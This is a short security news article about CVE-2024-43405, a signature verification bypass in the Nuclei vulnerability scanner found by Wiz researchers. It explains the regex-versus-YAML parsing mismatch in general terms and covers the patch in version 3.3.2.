Researchers discovered a signature verification bypass vulnerability in the Nuclei vulnerability scanner. Exploiting the flaw could allow an adversary to execute malicious code on the target environment.
A Nuclei Vulnerability Allowed Malicious Code Injection
The research team at Wiz discovered a serious vulnerability in the security tool Nuclei that could allow malicious code injection.
Nuclei is an open-source security tool from ProjectDiscovery, popular among various organizations for vulnerability scanning. It uses YAML-based templates to detect and address vulnerabilities, making it an effective tool for identifying exact vulnerabilities. It currently boasts over 2.1 million downloads on its GitHub page.
As explained in their post, the vulnerability was a signature verification bypass, which could let an adversary include malicious codes in the target templates.
Nuclei’s signature verification involves four steps: 1) Extracting the signature using regex to find the # digest: line, 2) excluding the signature from the template, 3) hashing the remaining content after signature extraction, and 4) validating the hash with the extracted signature. After these steps, the verified signature is parsed as YAML using Go’s gopkg.in/yaml.v2 library.
The vulnerability existed due to the simultaneous use of regex and YAML for signature parsing and the subsequent conflict. As stated,
“The regex-based signature parser uses the pattern
(?m)^#\\sdigest:\s.+$to identify lines starting with# digest:. Meanwhile, the YAML parser treats# digest:as a comment, ignoring it during execution. This creates a mismatch: the signature verification logic operates based on regex rules, while the execution logic relies on YAML parsing.
This conflict allowed an adversary to hide malicious codes within the templates that may go unnoticed during the verification and get parsed by YAML. This could be done by adding malicious content with a \r that would remain unnoticed by regex but could be parsed by YAML.
This vulnerability, CVE-2024-43405, has received a high severity rating with a CVSS score 7.8.
Following the researcher’s report, the developers patched the vulnerability with Nuclei 3.3.2. Hence, users should ensure they are running this or the later versions on their devices to receive the fix. Besides, where an immediate fix isn’t possible, the researchers advised using Nuclei in isolated or sandboxed environments.
Let us know your thoughts in the comments.